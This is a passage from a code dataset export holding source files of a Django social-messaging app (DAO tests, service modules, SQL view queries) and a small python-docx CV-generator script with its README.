"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.GroupDAO import *\nfrom adam2014.models import Group\n\nclass GroupDAOTest(TestCase):\n def setUp(self):\n self.group1 = {\"id\":1,\"name\":\"groupA\",\"ucount\":1,\"code\":\"535676\",\"creater_id\":1}\n self.group2 = {\"id\":2,\"name\":\"groupB\",\"ucount\":1,\"code\":\"155212\",\"creater_id\":2}\n\n Group.objects.create(**self.group1)\n Group.objects.create(**self.group2)\n\n def testInsertGroup(self):\n group3 = {\"name\":\"groupC\",\"ucount\":1,\"code\":\"12306\",\"creater_id\":1}\n before = len(Group.objects.all())\n print(\"testInsertGroup_before:\")\n print(Group.objects.all())\n insertGroup(**group3)\n print(\"testInsertGroup_after:\")\n print(Group.objects.all())\n self.assertEqual(getGroupByCode(\"12306\")[0].name,\"groupC\")\n after = len(Group.objects.all())\n self.assertEqual(after-before,1)\n\n def testGetGroupById(self):\n self.assertEqual(getGroupById(1).id,1)\n self.assertEqual(getGroupById(2).id,2)\n\n def testGetGroupByCode(self):\n groups = getGroupByCode(155212)\n print(\"testGetGroupByCode:155212\")\n for group in groups:\n print(group)\n\n def testUpdateGroup(self):\n group3 = {\"id\":1,\"name\":\"groupD\",\"ucount\":10,\"code\":\"1122\",\"creater_id\":1}\n updateGroup(**group3)\n print(\"testUpdateGroup:code:1122\")\n print(getGroupById(1))\n self.assertEqual(getGroupById(1).code,\"1122\")\n\n def testDeleteGroup(self):\n deleteGroup(1)\n deleteGroup(2)\n print(\"testDeleteAllGroup:\")\n print(Group.objects.all())\n self.assertEqual(len(Group.objects.filter(id=1)),0)\n self.assertEqual(len(Group.objects.filter(id=2)),0)\n\n\n"
},
{
"alpha_fraction": 0.6130836009979248,
"alphanum_fraction": 0.6427173614501953,
"avg_line_length": 39.647727966308594,
"blob_id": "af0528f37f30b066eb7b39e9c0c0bfe64b90cb32",
"content_id": "6ecd413754a9ad6698019344820fa0460a878cdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3829,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 88,
"path": "/zzc/adam2014/AllTest/DAOTest/testMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.MessageDAO import *\nfrom adam2014.models import Message\n\nclass MessageDAOTest(TestCase):\n def setUp(self):\n \t# Id\t主键\tint(11),自增,非空\t自增主键\n\t\t# type\t消息类型\tint(4),非空\t1文字,2语音,3图片,4位置。\n\t\t# content_id\t内容id\tInt(11),非空\t具体类型消息的id\n\t\t# time\t消息创建时间\tDatetime(),非空\t消息创建的具体时间\n\t\t# 我把setting的 USE_TZ = True 改成了 USE_TZ = False\n\t\t# 意思是不存储市区信息了,这样会消除一个插入time时候的warning\n\t\t# 并且将time这个域的default改成了datetime.datetime.now()\n self.textMessage = {\"id\":1,\"type\":1,\"content_id\":1} # 文字\n self.voiceMessage = {\"id\":2,\"type\":2,\"content_id\":2} # 语音\n self.pictureMessage = {\"id\":3,\"type\":3,\"content_id\":3} #图片\n self.locationMessage = {\"id\":4,\"type\":4,\"content_id\":4} #位置\n Message.objects.create(**self.textMessage)\n Message.objects.create(**self.voiceMessage)\n Message.objects.create(**self.pictureMessage)\n Message.objects.create(**self.locationMessage)\n\n # 加了之后的数量减去加了之前的数量等于1\n def test_insertMessage(self):\n \t# wenzi \n message5 = {\"type\":1,\"content_id\":5}\n before = len(Message.objects.all())\n insertMessage(**message5)\n after = len(Message.objects.all())\n self.assertEqual(after-before,1)\n # yuyin\n message6 = {\"type\":2,\"content_id\":6}\n before = len(Message.objects.all())\n insertMessage(**message6)\n after = len(Message.objects.all())\n self.assertEqual(after-before,1)\n # tupian\n message7 = {\"type\":3,\"content_id\":7}\n before = len(Message.objects.all())\n insertMessage(**message7)\n after = len(Message.objects.all())\n self.assertEqual(after-before,1)\n # weizhi\n message8 = {\"type\":4,\"content_id\":8}\n before = len(Message.objects.all())\n insertMessage(**message8)\n after = len(Message.objects.all())\n self.assertEqual(after-before,1)\n \n def test_getMessageById(self):\n self.assertEqual(getMessageById(1).id,1)\n self.assertEqual(getMessageById(2).id,2)\n self.assertEqual(getMessageById(3).id,3)\n self.assertEqual(getMessageById(4).id,4)\n\n def test_updateMessage(self):\n modified_textMessage = {\"id\":1,\"type\":1,\"content_id\":5}\n modified_voiceMessage = {\"id\":2,\"type\":2,\"content_id\":6}\n modified_pictureMessage = {\"id\":3,\"type\":3,\"content_id\":7}\n modified_locationMessage = {\"id\":4,\"type\":4,\"content_id\":8}\n updateMessage(**modified_textMessage)\n updateMessage(**modified_voiceMessage)\n updateMessage(**modified_locationMessage)\n updateMessage(**modified_pictureMessage)\n self.assertEqual(getMessageById(1).content_id,5)\n self.assertEqual(getMessageById(2).content_id,6)\n self.assertEqual(getMessageById(3).content_id,7)\n self.assertEqual(getMessageById(4).content_id,8)\n\n def test_deleteMessage(self):\n deleteMessage(1)\n deleteMessage(2)\n deleteMessage(3)\n deleteMessage(4)\n self.assertEqual(len(Message.objects.filter(id=1)), 0)\n self.assertEqual(len(Message.objects.filter(id=2)), 0)\n self.assertEqual(len(Message.objects.filter(id=3)), 0)\n self.assertEqual(len(Message.objects.filter(id=4)), 0)\n\n def test_getMessageByContentId(self):\n self.assertEqual(getMessageByContentId(1)[0].id,1)\n self.assertEqual(getMessageByContentId(2)[0].id,2)\n self.assertEqual(getMessageByContentId(3)[0].id,3)\n self.assertEqual(getMessageByContentId(4)[0].id,4)\n"
},
{
"alpha_fraction": 0.6588366627693176,
"alphanum_fraction": 0.6711409687995911,
"avg_line_length": 20.780487060546875,
"blob_id": "9d85556f36b224eea546bb9930daede9b6e8b6e0",
"content_id": "afd8d703c87ac19d0533133af95563f0dae46183",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 938,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 41,
"path": "/zzc/adam2014/Service/BottlePictureService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import BottlePicture\nfrom adam2014.DAO import BottlePictureDAO\nfrom django.db import IntegrityError, transaction\nimport random\n\ndef newBottlePicture(**BottlePicture):\n try:\n b = BottlePictureDAO.insertBottlePicture(**BottlePicture)\n except:\n return \"error\"\n return b\n\ndef deleteBottlePicture(id):\n try:\n BottlePictureDAO.deleteBottlePicture(id)\n except:\n return \"error\"\n return 'success'\n\ndef getBottlePicture():\n b = None\n ##定义捡漂流瓶的原则\n maxid = BottlePictureDAO.maxId()\n ##这里加一个随机函数 获得随机id\n id = random.randint(0,maxid)\n try:\n b = BottlePictureDAO.getBottlePictureById(id)\n b.usedTimes += 1\n b.save()\n except:\n pass\n return b\n\n"
},
{
"alpha_fraction": 0.691208004951477,
"alphanum_fraction": 0.7040743231773376,
"avg_line_length": 27.571428298950195,
"blob_id": "b56ad1d24a9662f7520534e464531b567d9f3a29",
"content_id": "f29c2e98838dfcbe55222600d4098254611c49c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1407,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 49,
"path": "/zzc/adam2014/Service/FriendRelationService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import FriendRelation\nfrom adam2014.DAO import FriendRelationDAO\nfrom django.db import IntegrityError, transaction\n\n\ndef newFriendRelation(**friendRelation):\n # 双向添加\n try:\n fr1 = FriendRelationDAO.insertFriendRelation(**friendRelation)\n friendRelation1 = friendRelation\n user_from_id = friendRelation1['user_from_id']\n friendRelation1['user_from_id']=friendRelation1['user_to_id']\n friendRelation1['user_to_id']=user_from_id\n fr2 = FriendRelationDAO.insertFriendRelation(**friendRelation1)\n except:\n return \"error\"\n return fr1\n\ndef deleteFriendRelation(user_from_id,user_to_id):\n try:\n FriendRelationDAO.deleteFriendRelation(user_from_id,user_to_id)\n FriendRelationDAO.deleteFriendRelation(user_to_id,user_from_id)\n except:\n return \"error\"\n return 'success'\n\ndef updateFriendRelation(**friendRelation):\n try:\n FriendRelationDAO.updateFriendRelation(**friendRelation)\n except:\n return 'error'\n return 'success'\n\ndef getFriendRelationByCondition(user_from_id,user_to_id):\n Fr = None\n try:\n Fr = FriendRelationDAO.getFriendRelationByCondition(user_from_id,user_to_id)\n except:\n pass\n return Fr"
},
{
"alpha_fraction": 0.7089678645133972,
"alphanum_fraction": 0.7157360315322876,
"avg_line_length": 25.244443893432617,
"blob_id": "fdadf9a9a2823014c0813c94c16db7aac9b3c9b9",
"content_id": "864182a8a03d55a23d4a5cd1c31f45fdc4100b4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1206,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 45,
"path": "/zzc/adam2014/DAO/AddFriendDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import AddFriend\n# class AddFriend(models.Model):\n# user_from = models.ForeignKey(User)\n# user_to_id = models.IntegerField()\n# time = models.DateTimeField()\n\n\ndef insertAddFriend(**addFriend):\n a = AddFriend.objects.create(**addFriend)\n return a\n\n\ndef deleteAddFriend(id):\n AddFriend.objects.get(id=id).delete()\n\ndef getAddFriendById(id):\n return AddFriend.objects.get(id=id)\n\ndef getAddFriendByuser_to_id(user_to_id):\n return AddFriend.objects.filter(user_to_id=user_to_id)\n\ndef getAddFriendByuser_from_id(user_from_id):\n return AddFriend.objects.filter(user_from_id=user_from_id)\n\ndef getAddFriendByuser_from_idAnduser_to_id(user_from_id,user_to_id):\n return AddFriend.objects.get(user_from_id=user_from_id,user_to_id=user_to_id)\n\n\ndef updateAddFriend(**kw):\n AddFriend.objects.filter(id=kw['id']).update(**kw)\n\n\n# 传入user_to_id 和 user_from_id, 判断二者是否为好友\ndef isFriend(**kw):\n return AddFriend.objects.get(user_to_id=kw['user_to_id'], user_from_id=kw['user_from_id'])\n\n"
},
{
"alpha_fraction": 0.6353510618209839,
"alphanum_fraction": 0.6668280959129333,
"avg_line_length": 36.563636779785156,
"blob_id": "ddc9db44617c0534ef8adcb11a8748fbe7d67a53",
"content_id": "58087292dffe5daa6a8a646ff69424a253d4e1eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2065,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 55,
"path": "/zzc/adam2014/AllTest/DAOTest/testVoiceMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'assiso'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.VoiceMessageDAO import *\nfrom adam2014.DAO.MessageDAO import *\nfrom adam2014.models import VoiceMessage\nfrom adam2014.models import Message\nfrom adam2014.models import User\nimport datetime\n\nclass VoiceMessageTest(TestCase):\n def setUp(self):\n self.time = datetime.datetime.now()\n self.message1 = {\"id\":1,\"time\":str(self.time),\"type\":3,\"content_id\":1}\n self.Voicemessage1 = {\"id\":1,\"content\":\"I am a voice message \",\"message_id\":1}\n self.message2 = {\"id\":2,\"time\":str(self.time),\"type\":3,\"content_id\":2}\n self.Voicemessage2 = {\"id\":2,\"content\":\"I am a voice message \",\"message_id\":2}\n self.message3 = {\"id\":3,\"time\":str(self.time),\"type\":3,\"content_id\":3}\n self.Voicemessage3 = {\"id\":3,\"content\":\"I am a voice message \",\"message_id\":3}\n\n Message.objects.create(**self.message1)\n Message.objects.create(**self.message2)\n Message.objects.create(**self.message3)\n\n VoiceMessage.objects.create(**self.Voicemessage1)\n VoiceMessage.objects.create(**self.Voicemessage2)\n VoiceMessage.objects.create(**self.Voicemessage3)\n\n def testInsertVoiceMessage(self):\n VoiceMessage4 = {\"id\":4,\"content\":\"I am a vioce message\"}\n VoiceMessage = insertVoiceMessage(**VoiceMessage4)\n message4 = {\"id\":4,\"time\":str(self.time),\"type\":3,\"content_id\":VoiceMessage.id}\n print(\"testInsertMessage before:\")\n message = insertMessage(**message4)\n print(Message.objects.all())\n VoiceMessage.id = message.id\n\n VoiceMessage.save()\n\n self.assertEqual(getVoiceMessageById(4).id,4)\n\n\n def testGetVoiceMessageById(self):\n self.assertEqual(getVoiceMessageById(1).id,1)\n self.assertEqual(getVoiceMessageById(2).id,2)\n\n\n\n def testDeleteVoiceMessage(self):\n deleteVoiceMessage(1)\n deleteVoiceMessage(2)\n deleteVoiceMessage(3)\n print(\"testDeleteVoiceMessage:3\")\n print(VoiceMessage.objects.all())"
},
{
"alpha_fraction": 0.5311039090156555,
"alphanum_fraction": 0.5961884260177612,
"avg_line_length": 45.349998474121094,
"blob_id": "a7b0e262c8b9a6b1c3c2eb85ff0567e2f8251da1",
"content_id": "936efb42e5cbb0021aacca692e611eec212cb63d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2781,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 60,
"path": "/zzc/adam2014/DAO/JoinDAO/FriendRelationListViewDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.JoinModels import FriendRelationListView\nfrom django.db import connection\n\ndef getFriendRelationListView(user_from_id):\n sql = \"select adam2014_friendrelation.id,adam2014_friendrelation.inBlackList,\" \\\n \"adam2014_friendrelation.top,adam2014_friendrelation.remark,adam2014_friendrelation.time,adam2014_user.id,\" \\\n \"adam2014_user.nickname,adam2014_user.longitude,adam2014_user.latitude,adam2014_user.code,\" \\\n \"adam2014_user.photo,adam2014_user.phone\"\\\n \" from adam2014_friendrelation,adam2014_user \" \\\n \"where adam2014_friendrelation.user_from_id = %s and adam2014_user.id = adam2014_friendrelation.user_from_id ;\"\n\n cursor = connection.cursor()\n cursor.execute(sql,[user_from_id])\n #row = cursor.fetchone()\n row = cursor.fetchall()\n\n Frs= []\n i = 0\n for i in range(len(row)):\n Frs.append(FriendRelationListView.FriendRelationListView(str(row[i][0]),str(row[i][1]),\n str(row[i][2]),str(row[i][3]),str(row[i][4]),str(row[i][5]),\n str(row[i][6]),str(row[i][7]),str(row[i][8]),str(row[i][9]),\n str(row[i][10]),str(row[i][11])))\n i+=1\n return Frs\n\n\ndef getAfriendRelationView(user_from_id,user_to_id):\n sql = \"select adam2014_friendrelation.id,adam2014_friendrelation.inBlackList,\" \\\n \"adam2014_friendrelation.top,adam2014_friendrelation.remark,adam2014_friendrelation.time,adam2014_user.id,\" \\\n \"adam2014_user.nickname,adam2014_user.longitude,adam2014_user.latitude,adam2014_user.code,\" \\\n \"adam2014_user.photo,adam2014_user.phone\"\\\n \" from adam2014_friendrelation,adam2014_user \" \\\n \"where adam2014_friendrelation.user_from_id = (%s) and adam2014_friendrelation.user_to_id = (%s) and adam2014_user.id = adam2014_friendrelation.user_from_id ;\"\n\n cursor = connection.cursor()\n cursor.execute(sql,[user_from_id,user_to_id])\n #row = cursor.fetchone()\n row = cursor.fetchall()\n\n Frs= []\n i = 0\n for i in range(len(row)):\n Frs.append(FriendRelationListView.FriendRelationListView(str(row[i][0]),str(row[i][1]),\n str(row[i][2]),str(row[i][3]),str(row[i][4]),str(row[i][5]),\n str(row[i][6]),str(row[i][7]),str(row[i][8]),str(row[i][9]),\n str(row[i][10]),str(row[i][11])))\n i+=1\n return Frs\n\n#getAfriendRelationView(13,2)[0].printout()\n"
}
] | 62 |
earies/yang-tools
|
https://github.com/earies/yang-tools
|
904f1134c3cef9055cb469a0347cfaca1b4d2af4
|
7a3428d8ba7876403aacc3d013d45e5ab713cc21
|
27a813d5e1288e88034c49ea34c2454e8e93929d
|
refs/heads/master
| 2020-12-11T09:03:32.876079 | 2016-04-04T00:58:22 | 2016-04-04T00:58:22 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.78125,
"alphanum_fraction": 0.78125,
"avg_line_length": 15,
"blob_id": "bdaa04c5605f4493cf5b1b91e5a7404af080210b",
"content_id": "3bb9716973c959297cca7991a4e22db7eff39712",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 2,
"path": "/README.md",
"repo_name": "earies/yang-tools",
"src_encoding": "UTF-8",
"text": "# yang\nyang model related works\n"
},
{
"alpha_fraction": 0.519706666469574,
"alphanum_fraction": 0.5226855874061584,
"avg_line_length": 33.63492202758789,
"blob_id": "8377dc7c8373e16d15788e176cab5a2901afb049",
"content_id": "adfd88ccfda8c34d1d6727576f8820fd1289a18b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4364,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 126,
"path": "/extractor/ietf95-hackathon/scripts/extractor.py",
"repo_name": "earies/yang-tools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport argparse\nimport json\nimport logging\nimport os\n\nFORMAT = '%(asctime)-15s %(levelname)s %(filename)s %(message)s'\nlogging.basicConfig(level=logging.INFO, format=FORMAT)\nlogger = logging.getLogger(__name__)\n\nparser = argparse.ArgumentParser(\n description='Extracts the typedef, identity, and grouping from a YANG model')\nparser.add_argument('source', type=str,\n help='The URL or filename of the YANG model')\nparser.add_argument('--src_dir', default='.', type=str,\n help='Optional: directory where to find the source model')\nparser.add_argument('--dst_dir', default='.', type=str,\n help='Optional: directory where to output the extracted data')\nparser.add_argument('--yang_type', default='all',\n help='Optional flag that determines what to extract (typedef, identity, grouping)')\nargs = parser.parse_args()\n\nclass YangTypeParser(object):\n def __init__(self, source, src_dir, dst_dir,\n yang_type):\n self.src_dir = src_dir\n self.input_file = os.path.join(src_dir, source)\n self.dst_dir = dst_dir\n self.yang_type = yang_type\n\n def get_typename(self, yang_type, line):\n name = line.split('{')[0].strip()\n name = name.lstrip(yang_type)\n name = name.lstrip()\n return(name)\n\n def extract_type(self, yang_type):\n fh = open(self.input_file)\n buf = fh.readlines()\n fh.close()\n\n start_flag = False\n title_flag = False\n nbrac = 0\n\n result = {}\n result['types'] = {}\n\n for line in buf:\n if start_flag is False:\n spos = line.find(yang_type)\n if spos >= 0 and spos < 5:\n start_flag = True\n title_flag = True\n\n if start_flag is True:\n if title_flag is True:\n type_name = self.get_typename(yang_type, line)\n if not result['types'].get(type_name):\n result['types'][type_name] = {}\n result['types'][type_name]['module'] = os.path.basename(self.input_file)\n result['types'][type_name]['type'] = yang_type\n data = []\n title_flag = False\n\n data.append(line)\n\n spos = line.find('{')\n if spos >= 0:\n nbrac = nbrac + 1\n\n spos = line.find('}')\n if spos >= 0:\n nbrac = nbrac - 1\n\n if nbrac == 0:\n result['types'][type_name]['data'] = ''.join(data)\n start_flag = False\n return(result)\n\n\n def write_json(self, edata):\n for type_name in edata['types']:\n result = {}\n result['module'] = {}\n yang_type = edata['types'][type_name]['type']\n module = edata['types'][type_name]['module']\n data = edata['types'][type_name]['data']\n\n result['module'][module] = {}\n result['module'][module][type_name] = {}\n result['module'][module][type_name]['type'] = yang_type\n result['module'][module][type_name]['data'] = data\n if not os.path.exists(self.dst_dir):\n os.makedirs(self.dst_dir)\n output_file = os.path.join(self.dst_dir, yang_type + '-' + type_name + '.json')\n if os.path.exists(output_file):\n logger.warning('file exists: %s (duplicate type: %s)', output_file, type_name)\n fh = open(output_file)\n file_exist = json.loads(fh.read())\n key = file_exist['module'].keys()[0]\n result['module'][key] = file_exist['module'][key]\n fh.close()\n output_json = json.dumps(result, indent=4)\n fh = open(output_file, 'w')\n fh.write(output_json)\n fh.close()\n\n\n def extract(self):\n if self.yang_type == 'all':\n for ytype in ['typedef', 'grouping', 'identity']:\n res = self.extract_type(ytype)\n self.write_json(res)\n else:\n res = self.extract_type(self.yang_type)\n self.write_json(res)\n\ndef main():\n yp = YangTypeParser(args.source, args.src_dir, args.dst_dir, args.yang_type)\n yp.extract()\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5926605463027954,
"alphanum_fraction": 0.5975534915924072,
"avg_line_length": 29.560747146606445,
"blob_id": "b0441abdcc6cad2626e8548ceb859101012be70e",
"content_id": "924be643d887822afd3074631445d9621ee25c3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3270,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 107,
"path": "/extractor/extractor.py",
"repo_name": "earies/yang-tools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport argparse\nimport os.path\nimport sys\n\n__author__ = 'Jie Dong, Tianran Zhou'\n__copyright__ = \"Copyright(c) 2015, Huawei Technologies\"\n__license__ = \"New-style BSD\"\n__email__ = \"[email protected], [email protected]\"\n__version__ = \"1.0\"\n\ndef get_name(type, head):\n\tname = head\n\tname = name.strip()\n\tname = name.lstrip(type)\n\tname = name.rstrip(' {')\n\tname = name.lstrip()\n\tprint(name)\n\treturn name\n\n\t\ndef extract_type(input_file, dst_path, dst_file, type, mode):\n\t\n\tfinput=open(input_file, \"r\")\n\talllines=finput.readlines()\n\tfinput.close();\n\tfoutput = 0\n\t\n\tdst_flag = True\n\tif dst_file.strip() == 'separate':\n\t\tdst_flag = False\n\t\n\t\n\tif dst_flag == True:\n\t\toutput_file = dst_path + dst_file\n\t\tif mode == True:\n\t\t\tfoutput = open(output_file, 'w')\n\t\telse:\n\t\t\tfoutput = open(output_file, 'a')\t\t\n \t\n\tstart_flag = False\n\ttitle_flag = False\n\tnbrac = 0\n\t\n\tfor eachline in alllines:\n\t\tif start_flag == False:\n\t\t\tspos = eachline.find(type,)\n\t\t\tif spos >= 0 and spos < 5:\n\t\t\t\tstart_flag = True\n\t\t\t\ttitle_flag = True\n\t\t\t \n\t\tif start_flag == True:\n\t\t\tif title_flag == True:\n\t\t\t\tif dst_flag == False:\n\t\t\t\t\toutput_file = dst_path + type + '-' + get_name(type,eachline) +'.txt'\n\t\t\t\t\tfoutput = open(output_file, \"w\")\n\t\t\t\t\t\n\t\t\t\ttitle_flag = False\n\t\t\t\t\n\t\t\tfoutput.writelines(eachline)\n\t\t\t\n\t\t\tspos = eachline.find('{',)\n\t\t\tif spos >= 0:\n\t\t\t\tnbrac = nbrac + 1\n\t\t\t\t\n\t\t\tspos = eachline.find('}',)\n\t\t\tif spos >= 0:\n\t\t\t\tnbrac = nbrac - 1\n\t\t\t\t\n\t\t\tif nbrac == 0:\n\t\t\t\tstart_flag = False\n\t\t\t\tfoutput.writelines('\\n')\n\t\t\t\tif dst_flag == False:\n\t\t\t\t\tfoutput.close\n\t\n\tif dst_flag == True:\n\t\tfoutput.close\n\n\t\ndef extract(src_path, src_file, dst_path, dst_file, type, debug):\n\tinput_file = src_path + src_file\n\t\n\tif type == 'all':\n\t\textract_type(input_file,dst_path, dst_file, 'typedef', True)\n\t\textract_type(input_file,dst_path, dst_file, 'grouping', False)\n\t\textract_type(input_file,dst_path, dst_file, 'identity', False)\n\telse:\n\t\textract_type(input_file,dst_path, dst_file, type, True)\t\n\nif __name__ == \"__main__\":\n \"\"\"\n Command line utility\n \"\"\"\n parser = argparse.ArgumentParser(description='Extracts the typedef, identity, and grouping from a YANG model')\n parser.add_argument(\"source\", help=\"The URL or file name of the YANG model to extract info from\")\n parser.add_argument(\"--srcdir\", default='./', help=\"Optional: directory where to find the source text; \"\n \"default is './'\")\n parser.add_argument(\"--dstdir\", default='./', help=\"Optional: directory where to put the extracted yang info; \"\n \"default is './'\")\n parser.add_argument(\"--dstfile\",default='separate', help=\"Optional: file to append the extracted information; \"\n \"default is 'separate file for each component'\")\n parser.add_argument(\"--type\", default= 'all', help=\"Optional flag that determines what to extract (typedef, identity, or grouping); \"\n \"default is 'all'\")\n parser.add_argument(\"--debug\", type=int, default=0, help=\"Optional: debug level\")\n args = parser.parse_args()\n \n extracted_info = extract (args.srcdir, args.source, args.dstdir, args.dstfile, args.type, args.debug)\n"
},
{
"alpha_fraction": 0.5963541865348816,
"alphanum_fraction": 0.5963541865348816,
"avg_line_length": 32.39130401611328,
"blob_id": "d7be998c9935a10af5406379ec5f7ecb0bebf0c0",
"content_id": "1922588537684ae9493dad181d168d2b82efb1b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 768,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 23,
"path": "/extractor/ietf95-hackathon/scripts/wrapper.py",
"repo_name": "earies/yang-tools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport argparse\nimport os\n\nparser = argparse.ArgumentParser(\n description='Wrapper script to run analysis on YANG modules')\nparser.add_argument('--debug', type=bool, default=False,\n help='Optional: Toggle debugging')\nargs = parser.parse_args()\n\ndef main():\n files = os.listdir('../models')\n for i in files:\n cmd = './extractor.py --src_dir ../models/ --dst_dir ../output/ --yang_type typedef ' + i\n os.popen(cmd).read()\n cmd = './extractor.py --src_dir ../models/ --dst_dir ../output/ --yang_type grouping ' + i\n os.popen(cmd).read()\n cmd = './extractor.py --src_dir ../models/ --dst_dir ../output/ --yang_type identity ' + i\n os.popen(cmd).read()\n\nif __name__ == '__main__':\n main()\n"
}
] | 4 |
angelo-inexa/python-cv-maker-project
|
https://github.com/angelo-inexa/python-cv-maker-project
|
2277834b94f46856589338ae9e5715b3287751d5
|
23d090bf4f4afff1a3aa4ae6ead8a74a997823d9
|
6b654b14ddeb72db0ce89d3d54f1ddf44f9b392b
|
refs/heads/main
| 2023-06-04T06:01:40.609288 | 2021-06-24T11:52:54 | 2021-06-24T11:52:54 | 379,907,284 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6330274939537048,
"alphanum_fraction": 0.7981651425361633,
"avg_line_length": 35.33333206176758,
"blob_id": "c250224f87ca489ba8214161b26eb531846d3f5c",
"content_id": "f4a6557c403ca7dc2a8038c9e931f7372448ec1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 218,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 6,
"path": "/README.md",
"repo_name": "angelo-inexa/python-cv-maker-project",
"src_encoding": "UTF-8",
"text": "# python cv maker project\n\n## Installation\nrun following command : `python install -r requirements.txt\n\n\n"
},
{
"alpha_fraction": 0.650597095489502,
"alphanum_fraction": 0.6532507538795471,
"avg_line_length": 24.404495239257812,
"blob_id": "9a64c390df771f9eca112a9dd4d3fc1e0f313c00",
"content_id": "b2439d598c2090462a5b28c44e4287621766db6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2261,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 89,
"path": "/my_app.py",
"repo_name": "angelo-inexa/python-cv-maker-project",
"src_encoding": "UTF-8",
"text": "from docx import Document\nfrom docx.shared import Inches\nimport pyttsx3\n\ndef speak(text):\n pyttsx3.speak(text)\n\n\ndocument = Document()\n\n#add profile picture to cv document\ndocument.add_picture(\n 'profile.jpg', \n width=Inches(2.0)\n)\n\n#get info from user\nname = input('Enter Your name? ')\nspeak('Hello '+ name + 'How are you today')\n\nspeak('what is your phone number? ')\nphone_number = input('what is your phone number? ')\nspeak('what is your phone email? ')\nemail = input('what is your email? ')\n\n#add text info to document\ndocument.add_paragraph(\n name + ' | ' + phone_number + ' | ' + email\n)\n\n# add heading to document\ndocument.add_heading('About Me')\ndocument.add_paragraph(\n input('Tell me about yourself ')\n)\n\n# add work experience \ndocument.add_heading('Work experience')\np = document.add_paragraph()\n\ncompany = input('Enter Company ') \nfrom_date = input('From date ')\nto_date = input('to date ')\n\np.add_run(company+ ' ').bold = True\np.add_run(from_date +'-' + to_date + '\\n').italic = True\nexperience_details = input('Describe Your experience at '+ company)\np.add_run(experience_details)\n\n# add more experience \nwhile True:\n has_more = input('Do you have more experiences? Y/N: ')\n if has_more.lower() == 'yes':\n p = document.add_paragraph()\n\n company = input('Enter Company ') \n from_date = input('From date ')\n to_date = input('to date ')\n\n p.add_run(company+ ' ').bold = True\n p.add_run(from_date +'-' + to_date + '\\n').italic = True\n experience_details = input('Describe Your experience at '+ company+' ')\n p.add_run(experience_details)\n \n else:\n break\n\n# add skills \ndocument.add_heading('Skills')\nskill = input('Enter one of your skills')\np = document.add_paragraph(skill)\np.style = 'List Bullet'\n\nwhile True:\n has_more = input('Do you have more skills? Y/N')\n if has_more.lower() == 'yes':\n skill = input('Enter one of your skills')\n p = document.add_paragraph(skill)\n p.style = 'List Bullet'\n \n else:\n break\n\n# footer\nsection = document.sections[0]\nfooter = section.footer\np = footer.paragraphs[0]\np.text = \"CV generated using Python in collaboration with amigoscode and Institut QuickBooks\"\ndocument.save('cv.docx') "
}
] | 2 |
therodesun/recipes.io
|
